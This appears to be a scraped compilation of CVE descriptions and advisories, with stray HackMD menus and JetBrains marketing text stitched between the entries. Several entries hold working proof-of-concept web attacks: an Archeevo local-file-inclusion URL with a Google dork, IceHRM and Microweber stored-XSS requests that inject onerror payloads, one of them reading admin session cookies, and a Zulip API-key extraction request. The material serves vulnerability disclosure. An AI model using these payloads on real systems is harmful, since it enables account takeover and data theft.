A stored cross-site scripting (XSS) vulnerability in the admin interface in Element-IT HTTP Commander 7.0.0 allows unauthenticated users to get admin access by injecting a malicious script in the User-Agent field.

CVE-2022-24573: Element-IT software products news

Archeevo below 5.0 is affected by local file inclusion through file=~/web.config to allow an attacker to retrieve local files.

    # Exploit Title: Archeevo 5.0 - Local File Inclusion
    # Google Dork: intitle:"archeevo"
    # Date: 01/15/2021
    # Exploit Author: Miguel Santareno
    # Vendor Homepage: https://www.keep.pt/
    # Software Link: https://www.keep.pt/produtos/archeevo-software-de-gestao-de-arquivos/
    # Version: < 5.0
    # Tested on: windows
    
    # 1. Description
    
    Unauthenticated user can exploit LFI vulnerability in file parameter.
    
    
    # 2. Proof of Concept (PoC)
    
    Access a page that don’t exist like /test.aspx and then you will be redirected to
    https://vulnerable_webiste.com/error?StatusCode=404&file=~/FileNotFoundPage.html
    
    After that change the file /FileNotFoundPage.html to /web.config and you be able to see the
    /web.config file of the application.
    
    https://vulnerable_webiste.com/error?StatusCode=404&file=~/web.config
    
    
    # 3. Research:
    https://miguelsantareno.github.io/MoD_1.pdf

CVE-2022-23377: Offensive Security’s Exploit Database Archive

An out-of-bounds read vulnerability exists in the GCode::extrude() functionality of Slic3r libslic3r 1.3.0 and Master Commit b1a5500. A specially crafted stl file could lead to information disclosure. An attacker can provide a malicious file to trigger this vulnerability.

HackMD

*   

*   

*   

*   *   Options
    *   Versions and GitHub Sync
    *   Transfer ownership
    *   Delete this note
    *   Template
    *   Insert from template
    *   Export
    *   Dropbox
    *   Google Drive
    *   Gist
    *   Import
    *   Dropbox
    *   Google Drive
    *   Gist
    *   Clipboard
    *   Download
    *   Markdown
    *   HTML
    *   Raw HTML
    *   ODF (Beta)
*   *   Sharing
    
    *   View mode
        
        *   Edit mode
        *   View mode
        *   Book mode
        *   Slide mode
        
    *   Note Permission
    *   Read
        
        *   Owners
        *   Signed-in users
        *   Everyone
        
    *   Write
        
        *   Owners
        *   Signed-in users
        *   Everyone
        
    *   More (Comment, Invitee)

CVE-2021-44962: Slic3r libslic3r STL File GCode::extrude() out-of-bounds read vulnerability

A stored cross-site scripting (XSS) vulnerability in Ice Hrm 30.0.0.OS allows attackers to steal cookies via a crafted payload inserted into the First Name field.

This vulnerability was reported to the maintainers on **Nov 23rd, 2021**, and there has been no response yet. So, I infer it makes sense to publish it publicly here for the good sake of everyone who is using this software actively.

An Authenticated user can set thier 'first name' to any unsanitized HTML or script.

IceHRM website fails to effectively filter html tags present in user input. This can cause malicious input sent by a logged in user to be stored on the database. This can lead to account takeover through cookie stealing of any other user who logs into the system, no other user interation is require.

    curl 'http://127.0.0.1/icehrm/app/service.php' \
      -H 'Connection: keep-alive' \
      -H 'Pragma: no-cache' \
      -H 'Cache-Control: no-cache' \
      -H 'sec-ch-ua: "Google Chrome";v="93", " Not;A Brand";v="99", "Chromium";v="93"' \
      -H 'DNT: 1' \
      -H 'sec-ch-ua-mobile: ?0' \
      -H 'User-Agent: Mozilla/5.0' \
      -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
      -H 'Accept: application/json, text/javascript, */*; q=0.01' \
      -H 'X-Requested-With: XMLHttpRequest' \
      -H 'sec-ch-ua-platform: "Linux"' \
      -H 'Origin: http://127.0.0.1' \
      -H 'Sec-Fetch-Site: same-origin' \
      -H 'Sec-Fetch-Mode: cors' \
      -H 'Sec-Fetch-Dest: empty' \
      -H 'Referer: http://127.0.0.1/icehrm/app/?g=modules&&n=employees&m=modules_Personal_Information' \
      -H 'Accept-Language: en-US,en;q=0.9' \
      -H 'Cookie: PHPSESSID=p165r7jp664smtns7lh26tn6e8; tbl_session=lk93k2rif7jvprfqs05pqk41t65436nu' \
      -H 'sec-gpc: 1' \
      --data-raw 'id=2&first_name=hello%3Cimg+src%3Dx+onerror%3Dalert(document.cookie)%3E&middle_name=&last_name=sd&nationality=2&birthday=2021-12-03&gender=Female&marital_status=Single&ssn_num=&nic_num=&other_id=&driving_license=&work_station_id=&address1=&address2=&city=&province=NULL&postal_code=&home_phone=&mobile_phone=&work_phone=&private_email=asd%40asd.com&a=add&t=Employee&content=HTML' \
      --compressed
    

#3. Login into the 'admin' account & Go to the following page where the name of the less privileged user gets displayed - 'System > Users' . You'll be able to see the alert box with session cookie of 'admin' user.

The extra added `content = HTML` request parameter causes the backend to ignore sanitization of user input.

A less privileged user can take over 'admin' account by stealing the session cookie.

CVE-2022-25015: Stored XSS vulnerability in dashboard of any logged-in user · Issue #285 · gamonoid/icehrm

The Yoast SEO WordPress plugin before 17.3 discloses the full internal path of featured images in posts via the wp/v2/posts REST endpoints which could help an attacker identify other vulnerabilities or help during the exploitation of other identified vulnerabilities.

CVE-2021-25118: Changeset 2608691 – WordPress Plugin Repository

The Maps Plugin using Google Maps for WordPress plugin before 1.8.4 does not have CSRF checks in most of its AJAX actions, which could allow attackers to make logged in admins delete arbitrary posts and update the plugin's settings via a CSRF attack

CVE-2021-25081

The Maps Plugin using Google Maps for WordPress plugin before 1.8.1 does not have proper authorisation and CSRF in most of its AJAX actions, which could allow any authenticated users, such as subscriber to delete arbitrary posts and update the plugin's settings.

CVE-2021-25011

Improper Access Control in GitHub repository zulip/zulip prior to 4.10.

**Description**

According to the current design of the application, when the user wants to get value of api\_key, API /json/fetch\_api\_key will require password to authentication. However, the application exists another API routed at /json/users/me/api\_key/regenerate that allows regenerating api\_key value and doesn't requiring password authentication. Attacker who gets the user's valid session can call vulnerable API to extract the api\_key value without user's password.

**Proof of Concept****I'm using online service at https://testingnnnn.zulipchat.com.**

*   Step 1: Login as normal user, go to https://testingnnnn.zulipchat.com/#settings/account-and-privacy, click "Show/change your API key", application will ask for password to perform the action.
*   Step 2: In current session, call this request to regenerate and get value of api\_key

    POST /json/users/me/api_key/regenerate HTTP/2
    Host: testingnnnn.zulipchat.com
    Cookie: [YOUR_VALID_COOKIE]
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    X-Csrftoken: [VALID_CSRF_TOKEN]
    X-Requested-With: XMLHttpRequest
    Referer: https://testingnnnn.zulipchat.com/
    Connection: close
    
    
    

*   PoC:

Show api\_key: https://drive.google.com/file/d/1\_A7KQeoyByA3xYwIyJ1k9ZTywabwlEMM

Regenerate api\_key: https://drive.google.com/file/d/1Ob96FTju4irz2Hn2sXBXz\_JtMlEAmAp0

**Impact**

Bypass the protection mechanism in the design of the application. Attackers can get the api\_key value without knowing user's password.

CVE-2021-3967: Improper Access Control in zulip

Cross-site Scripting (XSS) - Stored in GitHub repository microweber/microweber prior to 1.3.

**Description**

I found a Stored XSS vulnerability at admin page: https://demo.microweber.org/demo/admin/view:settings#option\_group=files

**Proof of Concept**

    Step 1: Go to Settings > Website settings > Files
    Step 2: Create new folder with folder name : <img scr=0 onerror=alert(1)>
    
    // Request
    ---------------------------------------
    POST /demo/api/create_media_dir HTTP/1.1
    Host: demo.microweber.org
    Cookie: back_to_admin=https%3A//demo.microweber.org/demo/admin/view%3Asettings%23option_group%3Dfiles; csrf-token-data=%7B%22value%22%3A%22CWFoo1r5aSs0Eh43ggbPh7ZrADzLJq9pqxcn2oVo%22%2C%22expiry%22%3A1645524272281%7D; mw-back-to-live-edit=true; show-sidebar-layouts=0; laravel_session=pnfZUavpfYyBW2Nem7BpY0Ove87uyklKnGMAZgpA; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=2%7CRrQ72IHSMWcZZ25VCSQGCbqyg25qhWmSDCJNwDVH4X3Z736hG3mxHR05oNrZ%7C%242y%2410%24114oPbqv.UAg3ca706prIuSTMe3pAc9qYqT2gOBR1uldB9UTk%2FlYu
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 60
    Origin: https://demo.microweber.org
    Referer: https://demo.microweber.org/demo/admin/view:settings
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    Te: trailers
    Connection: close
    
    path=&name=%3Cimg+src%3D0+onerror%3Dalert(1)%3E&new_folder=1
    ---------------------------------------
    
    Step3: After create folder successful, see alert popup
    
    PoC:
    Request: https://drive.google.com/file/d/1daorHwquywP3LPh6na5PIZzWb2lEL19W/view?usp=sharing
    Alert popup: https://drive.google.com/file/d/1iTtAwQNHrpfktGHHXDrJ_7XPYlBOAHxe/view?usp=sharing
    

**Impact**

This vulnerability is capable of stored XSS

CVE-2022-0763: Cross-site Scripting (XSS) - Stored in microweber

JetBrains IntelliJ IDEA 2021.3.1 Preview, IntelliJ IDEA 2021.3.1 RC, PyCharm Professional 2021.3.1 RC, GoLand 2021.3.1, PhpStorm 2021.3.1 Preview, PhpStorm 2021.3.1 RC, RubyMine 2021.3.1 Preview, RubyMine 2021.3.1 RC, CLion 2021.3.1, WebStorm 2021.3.1 Preview, and WebStorm 2021.3.1 RC (used as Remote Development backend IDEs) bind to the 0.0.0.0 IP address. The fixed versions are: IntelliJ IDEA 2021.3.1, PyCharm Professional 2021.3.1, GoLand 2021.3.2, PhpStorm 2021.3.1 (213.6461.83), RubyMine 2021.3.1, CLion 2021.3.2, and WebStorm 2021.3.1.

*   JavaScript
*   .NET
*   Java & JVM
*   C++
*   macOS & iOS
*   Python & Django
*   PHP
*   Ruby & Rails
*   Go
*   Kotlin
*   SQL
*   See all tools

**Trusted**

Many of the world's most dynamic companies and individuals find JetBrains tools make them more creative and effective.

12.8M

users trust our tools

Our tools are used all over the world in some of the best-known companies.

*   Google
*   NASA
*   Valve
*   Netflix
*   Ubisoft
*   Twitter

**Customer Stories**

See how the world's leading companies use JetBrains products

**OpenStack**

PyCharm has tons of advantages when compared to text editors in terms of supported functionality. With respect to Python development, PyCharm definitely stands out with features like remote debugging, code quality checks, and integrations with third-party software like Docker and Kubernetes.

Swapnil Kulkarni, Active Technology Contributor, OpenStack

Read case study

**Instil**

When the social distancing restrictions were introduced in March 2020, we needed a tool that would let us collaborate online with students as part of virtual deliveries, and Space was the obvious choice.

Garth Gilmour, Instil

Read case study

**VMware**

As our team carefully weighed the benefits and shortcomings of building our strategy upon each of the frameworks, Kotlin Multiplatform Mobile ultimately emerged as the framework of choice.

Kris Wong, Software Engineer/Architect, VMware

Read case study

More case studies

**Discover more**

Tag

#google